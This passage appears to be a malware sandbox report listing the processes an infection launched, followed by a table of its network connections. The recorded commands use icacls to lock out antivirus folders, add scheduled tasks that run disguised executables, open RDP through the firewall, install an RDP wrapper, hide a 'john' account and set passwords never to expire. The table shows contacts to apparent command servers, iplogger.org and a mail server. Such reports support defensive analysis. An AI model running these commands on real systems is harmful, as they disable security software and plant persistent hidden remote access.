C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_mobsync.zip\mobsync.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:8
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:8
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 2.18.27.92:443 | copilot.microsoft.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 184.51.127.32:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| IE | 23.216.155.137:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| IT | 184.51.127.32:443 | assets.msn.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| IE | 23.216.155.169:443 | www.bing.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | udp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| FR | 13.249.9.46:443 | sb.scorecardresearch.com | tcp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| IE | 23.216.155.169:443 | www.bing.com | udp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.74:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.110.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| IE | 23.216.155.169:443 | www.bing.com | udp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | udp |
| US | 149.255.35.125:443 | | tcp |
| FR | 51.178.195.151:443 | | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 2.16.55.12:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| FR | 51.178.195.151:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| IT | 184.51.127.41:443 | deff.nelreports.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| IE | 2.19.176.96:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | | tcp |
| CA | 51.222.39.81:443 | | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| FR | 51.77.7.204:443 | | tcp |
| CA | 51.222.39.81:443 | | tcp |
| US | 149.255.35.125:443 | | tcp |
| US | 38.68.50.179:443 | | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| US | 38.68.50.179:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 51.77.7.204:443 | | tcp |
| FR | 51.77.7.204:443 | | tcp |
| IE | 23.216.155.155:443 | www.bing.com | udp |
| IE | 23.216.155.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
